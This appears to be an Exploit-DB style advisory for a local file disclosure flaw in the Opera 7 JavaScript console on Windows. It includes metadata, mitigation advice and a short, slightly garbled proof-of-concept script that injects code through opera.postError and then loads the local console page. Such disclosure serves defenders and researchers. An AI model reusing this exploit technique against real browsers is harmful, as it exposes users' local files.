Opera 7 Browsers for Microsoft Windows Local File Disclosure Vulnerability

vendor:

Opera

by:

SecurityFocus

7.5

CVSS

HIGH

Local File Disclosure Vulnerability

200

CWE

Product Name: Opera

Affected Version From: 7

Affected Version To: 7

Patch Exists: Yes

Related CWE: N/A

CPE: a:opera_software:opera

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Microsoft Windows

2002

Opera 7 Browsers for Microsoft Windows Local File Disclosure Vulnerability

A vulnerability has been reported for Opera 7 browsers for Microsoft Windows operating systems. The vulnerability exists in the Opera JavaScript console. Attackers may exploit the vulnerability to execute script code in a sensitive context. Exploitation of this vulnerability may lead to disclosure of local file contents. Additional exploit examples can be found in the attached Bugtraq reference.

Mitigation:

Upgrade to the latest version of Opera 7 browser.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/7449/info

A vulnerability has been reported for Opera 7 browsers for Microsoft Windows operating systems. The vulnerability exists in the Opera JavaScript console. Attackers may exploit the vulnerability to execute script code in a sensitive context. Exploitation of this vulnerability may lead to disclosure of local file contents.

ar message = "http://');alert(location.href+'";
opera.postError( message );
location.href = "file://localhost/console.html";

var message = "http://&#39;);alert(location.href+&#39;";
opera.postError( message );

Additional exploit examples can be found in the attached Bugtraq reference.
location.href = "file://localhost/console.html";